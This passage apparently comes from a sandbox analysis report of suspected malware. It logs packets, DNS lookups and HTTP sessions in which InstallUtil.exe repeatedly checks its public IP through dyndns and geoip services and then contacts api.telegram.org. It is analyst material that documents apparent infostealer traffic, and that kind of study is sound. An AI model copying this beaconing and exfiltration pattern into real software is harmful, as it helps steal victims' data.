                                                Oct 8, 2024 12:45:29.477551937 CEST4981080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:29.478382111 CEST4982380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:29.483314037 CEST8049810158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:29.483381033 CEST4981080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:29.483908892 CEST8049823158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:29.483983040 CEST4982380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:29.484325886 CEST4982380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:29.490317106 CEST8049823158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:30.053703070 CEST8049823158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:30.056524992 CEST49826443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:30.056561947 CEST44349826188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:30.056839943 CEST49826443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:30.057037115 CEST49826443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:30.057054043 CEST44349826188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:30.108871937 CEST4982380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:30.520833015 CEST44349826188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:30.557199955 CEST49826443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:30.557233095 CEST44349826188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:30.673743010 CEST44349826188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:30.673969984 CEST44349826188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:30.674047947 CEST49826443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:30.681833982 CEST49826443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:30.976641893 CEST4982380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:30.978316069 CEST4983080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:30.983262062 CEST8049823158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:30.983320951 CEST4982380192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:30.984786987 CEST8049830158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:30.984870911 CEST4983080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:30.985053062 CEST4983080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:30.989926100 CEST8049830158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:31.593583107 CEST8049830158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:31.595330954 CEST49836443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:31.595356941 CEST44349836188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:31.595441103 CEST49836443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:31.595767975 CEST49836443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:31.595782995 CEST44349836188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:31.640043974 CEST4983080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:32.077251911 CEST44349836188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:32.079175949 CEST49836443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:32.079209089 CEST44349836188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:32.208159924 CEST44349836188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:32.208395004 CEST44349836188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:32.208586931 CEST49836443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:32.216943979 CEST49836443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:32.220396042 CEST4983080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:32.221440077 CEST4984280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:32.226013899 CEST8049830158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:32.226094007 CEST4983080192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:32.226274967 CEST8049842158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:32.227051973 CEST4984280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:32.227133989 CEST4984280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:32.231995106 CEST8049842158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:32.798190117 CEST8049842158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:32.799683094 CEST49848443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:32.799736977 CEST44349848188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:32.799830914 CEST49848443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:32.800076962 CEST49848443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:32.800096989 CEST44349848188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:32.843241930 CEST4984280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:33.256808996 CEST44349848188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:33.260404110 CEST49848443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:33.260485888 CEST44349848188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:33.390706062 CEST44349848188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:33.390980005 CEST44349848188.114.97.3192.168.2.5
                                                Oct 8, 2024 12:45:33.391083956 CEST49848443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:33.404522896 CEST49848443192.168.2.5188.114.97.3
                                                Oct 8, 2024 12:45:33.418229103 CEST4984280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:33.418929100 CEST49853443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:33.418982983 CEST44349853149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:33.419049025 CEST49853443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:33.419893980 CEST49853443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:33.419909954 CEST44349853149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:33.423656940 CEST8049842158.101.44.242192.168.2.5
                                                Oct 8, 2024 12:45:33.423731089 CEST4984280192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:34.033351898 CEST44349853149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:34.033430099 CEST49853443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:34.035832882 CEST49853443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:34.035840988 CEST44349853149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:34.036206961 CEST44349853149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:34.037415981 CEST49853443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:34.083437920 CEST44349853149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:34.280041933 CEST44349853149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:34.280209064 CEST44349853149.154.167.220192.168.2.5
                                                Oct 8, 2024 12:45:34.280266047 CEST49853443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:34.282872915 CEST49853443192.168.2.5149.154.167.220
                                                Oct 8, 2024 12:45:39.229495049 CEST4970780192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:43.662098885 CEST4973880192.168.2.5158.101.44.242
                                                Oct 8, 2024 12:45:48.713592052 CEST4977680192.168.2.5158.101.44.242

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 8, 2024 12:44:57.919799089 CEST5595453192.168.2.51.1.1.1
                                                Oct 8, 2024 12:44:57.927849054 CEST53559541.1.1.1192.168.2.5
                                                Oct 8, 2024 12:44:58.893565893 CEST6257953192.168.2.51.1.1.1
                                                Oct 8, 2024 12:44:58.901654005 CEST53625791.1.1.1192.168.2.5
                                                Oct 8, 2024 12:45:23.582640886 CEST5443953192.168.2.51.1.1.1
                                                Oct 8, 2024 12:45:23.589468002 CEST53544391.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 8, 2024 12:44:57.919799089 CEST192.168.2.51.1.1.10x7530Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:44:58.893565893 CEST192.168.2.51.1.1.10xed9dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:45:23.582640886 CEST192.168.2.51.1.1.10xfd98Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 8, 2024 12:44:57.927849054 CEST1.1.1.1192.168.2.50x7530No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Oct 8, 2024 12:44:57.927849054 CEST1.1.1.1192.168.2.50x7530No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:44:57.927849054 CEST1.1.1.1192.168.2.50x7530No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:44:57.927849054 CEST1.1.1.1192.168.2.50x7530No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:44:57.927849054 CEST1.1.1.1192.168.2.50x7530No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:44:57.927849054 CEST1.1.1.1192.168.2.50x7530No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:44:58.901654005 CEST1.1.1.1192.168.2.50xed9dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:44:58.901654005 CEST1.1.1.1192.168.2.50xed9dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Oct 8, 2024 12:45:23.589468002 CEST1.1.1.1192.168.2.50xfd98No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • reallyfreegeoip.org
                                                • api.telegram.org
                                                • checkip.dyndns.org

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704158.101.44.242803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:44:57.939714909 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:44:58.518382072 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:44:58 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 6bd73b67df3aa21f455cfcc4793e9c51
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:44:58.557729959 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:44:58.714046001 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:44:58 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: ea73b4f118492b2dd3f80a98ebed17d5
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:44:59.575120926 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:44:59.730695963 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:44:59 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: ac92ee8a7cee845de03b52f5b4c3d142
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549707158.101.44.242803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:00.380058050 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:05.668442011 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:05 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 50331549242963d1c92551b5be7e9014
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549709158.101.44.242803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:06.423011065 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:10.920150995 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 3d4e2153e9645756c74d4887287c58ba
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549710158.101.44.242805480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:09.949476004 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:13.348675966 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:13 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 1ffca4ed7abb2655bf8baf575b9f0203
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:13.352572918 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:14.353023052 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:14 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 77321d8ad66524bcefb92783b1e646ba
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:15.158042908 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:15.316196918 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: bb5d92978e63a658a5e733d315aa8de6
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549712158.101.44.242803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:11.546088934 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:15.104648113 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: ec3f50ac839e4ae9d386447ae5d3009c
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549728158.101.44.242803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:15.754805088 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:16.323411942 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:16 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 28818396dbaf9b6fa87fce03fd7db588
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.549729158.101.44.242805480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:15.943516016 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Oct 8, 2024 12:45:16.520503044 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:16 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 4d668e7fe0ea412fe465d5f8f3917e6a
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.549737158.101.44.242803228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:17.592659950 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:18.189933062 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 063a601757e65994a1f4e4f60c5090f6
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.275291920 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 063a601757e65994a1f4e4f60c5090f6
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.275808096 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 063a601757e65994a1f4e4f60c5090f6
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Oct 8, 2024 12:45:19.277539015 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 063a601757e65994a1f4e4f60c5090f6
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.549738158.101.44.242805480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:17.595375061 CEST127OUTGET / HTTP/1.1
